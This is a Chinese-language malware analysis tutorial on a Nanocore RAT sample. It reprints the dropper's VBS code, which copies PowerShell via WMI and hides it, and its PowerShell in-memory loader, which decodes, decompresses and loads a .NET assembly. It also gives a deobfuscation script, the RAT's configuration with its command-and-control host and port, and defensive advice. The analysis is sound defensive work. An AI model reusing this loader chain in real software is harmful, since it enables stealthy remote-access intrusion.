Nanocore恶意脚本分析教学文档

1. 样本信息

• SHA256: c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1
• 下载链接: VirusShare

2. 样本结构分析

该样本采用四层嵌套结构：

1. 外层VBS脚本
2. 内层VBS脚本
3. PowerShell脚本
4. Nanocore RAT

3. VBS脚本分析

3.1 初始混淆处理

原始VBS脚本包含大量干扰字符串，可通过正则表达式^(REM|').*过滤提取核心代码。

3.2 混淆技术解析

混淆主要使用chr()函数结合算术运算：

chr(479808/&H1B90)

解析方法：

1. 将十六进制&H1B90转换为十进制7072
2. 计算479808/7072=67.8
3. 取整后使用chr(68)得到字符'D'

3.3 自动化提取脚本

使用Python可批量提取混淆后的payload：

import re

def read_text(filename):
    with open(filename, 'r') as f:
        return f.read()

def calc(string):
    if "/" in string:
        return int(string.split("/")[0]) / int(string.split("/")[-1], 16)
    elif "+" in string:
        return int(string.split("+")[0]) + int(string.split("+")[-1], 16)

Nanocore_text = read_text('Nanocore.txt')
pattern = re.compile(r'chr$([^)]+)$')
matchers = pattern.findall(Nanocore_text)
code = ""

for matcher in matchers:
    matcher = matcher.replace("&H", "0x")
    matcher = matcher.replace('chr(', '').replace(')', '')
    matcher = matcher.replace('CLng(', '')
    matcher = calc(matcher)
    matcher = chr(int(matcher))
    code += matcher.replace('\n', '')

with open('Nanocore.vbs', 'w') as f:
    f.write(code)

4. VBS核心功能分析

4.1 初始化

Dim scriptPath, scriptFolder, sourcePath, destinationPath, scriptNameWithoutExtension
Dim fso, shell
Set fso = CreateObject("Scripting.FileSystemObject")

• 创建FileSystemObject用于文件操作

4.2 获取脚本信息

scriptPath = WScript.ScriptFullName
scriptFolder = fso.GetParentFolderName(scriptPath)
scriptNameWithoutExtension = fso.GetFileName(scriptPath)
destinationPath = scriptFolder & "\" & scriptNameWithoutExtension & ".exe"

• 获取当前脚本路径并构造目标路径（添加.exe后缀）

4.3 构造PowerShell路径

part1 = "%S"
part2 = "ystem"
[...]
fullPath = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13

• 拼接后实际路径：%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

4.4 复制PowerShell

Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
strCommand = "cmd /c copy """ & sourcePath & """ """ & destinationPath & """ /Y"
Set objProcess = objWMIService.Get("Win32_Process")
objProcess.Create strCommand

• 通过WMI执行命令复制PowerShell到当前目录

4.5 设置文件属性

Set file = fso.GetFile(destinationPath)
file.Attributes = 4 + 2  '系统文件+隐藏

4.6 执行PowerShell

shell.Run destinationPath & " -enc [Base64编码的命令]"

• 使用Base64编码的PowerShell命令执行下一阶段

5. PowerShell脚本分析

5.1 获取当前进程路径

$Cvokayktpr = [System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName.Replace('.exe','')

• 获取当前进程路径并去除.exe后缀

5.2 读取脚本最后一行

$Zznkzyflgjw = get-content $Cvokayktpr | Select-Object -Last 1
$Cfxzis = [System.Convert]::FromBase64String($Zznkzyflgjw.Replace('REM ','').Replace('@','A'))

• 读取脚本最后一行
• 移除"REM "和替换"@"为"A"
• Base64解码

5.3 内存解压Gzip数据

$Kcxpqt = New-Object System.IO.MemoryStream(,$Cfxzis)
$Gcywezypgq = New-Object System.IO.MemoryStream
$Zqtwgobjxdw = New-Object System.IO.Compression.GzipStream $Kcxpqt,([IO.Compression.CompressionMode]::Decompress)
$Zqtwgobjxdw.CopyTo($Gcywezypgq)

• 在内存中解压Gzip数据

5.4 加载并执行程序集

[byte[]]$Cfxzis = $Gcywezypgq.ToArray()
[Array]::Reverse($Cfxzis)
$Fhzxwihzn = [System.AppDomain]::CurrentDomain.Load($Cfxzis)
$Adcoj = $Fhzxwihzn.EntryPoint
[System.Delegate]::CreateDelegate([Action],$Adcoj.DeclaringType,$Adcoj.Name).DynamicInvoke() | Out-Null

• 反转字节数组
• 加载为.NET程序集
• 动态调用入口点方法

6. Nanocore RAT分析

6.1 特征信息

{
  "NanoCore": {
    "KeyboardLogging": ["True"],
    "BuildTime": ["2024-08-08 05:36:51.971568"],
    "Version": ["1.2.2.0"],
    "Mutex": ["5a71ca6b-558e-46f1-b51d-f5c300aa04cd"],
    "DefaultGroup": ["D-Online23rd"],
    "PrimaryConnectionHost": ["builderlloulirabaonline23rd.mywire.org"],
    "BackupConnectionHost": ["127.0.0.1"],
    "ConnectionPort": ["7077"],
    "RunOnStartup": ["False"],
    "RequestElevation": ["False"],
    "BypassUserAccountControl": ["False"],
    "ClearZoneIdentifier": ["True"],
    "ClearAccessControl": ["False"],
    "SetCriticalProcess": ["False"],
    "PreventSystemSleep": ["True"],
    "ActivateAwayMode": ["False"],
    "EnableDebugMode": ["False"],
    "RunDelay": ["0"],
    "ConnectDelay": ["4000"],
    "RestartDelay": ["5000"],
    "TimeoutInterval": ["5000"],
    "KeepAliveTimeout": ["30000"],
    "MutexTimeout": ["5000"],
    "LanTimeout": ["2500"],
    "WanTimeout": ["8000"],
    "BufferSize": ["65535"],
    "MaxPacketSize": ["10485760"],
    "GCThreshold": ["10485760"],
    "UseCustomDnsServer": ["True"],
    "PrimaryDnsServer": ["8.8.8.8"],
    "BackupDnsServer": ["8.8.4.4"],
    "cncs": [["builderlloulirabaonline23rd.mywire.org:7077", "127.0.0.1:7077"]]
  }
}

6.2 技术特点

1. 使用多层混淆和嵌套执行
2. 无文件落地技术
3. 内存加载恶意代码
4. 使用合法的PowerShell进程作为载体
5. 伪造PDF图标增加迷惑性

7. 防御建议

1. 监控异常PowerShell和WMI活动
2. 限制脚本执行权限
3. 检测Base64和Gzip内存加载行为
4. 监控异常的网络连接（特别是7077端口）
5. 检查系统进程是否有异常的内存操作行为
6. 关注Mutex创建（5a71ca6b-558e-46f1-b51d-f5c300aa04cd）
7. 阻止对mywire.org域名的访问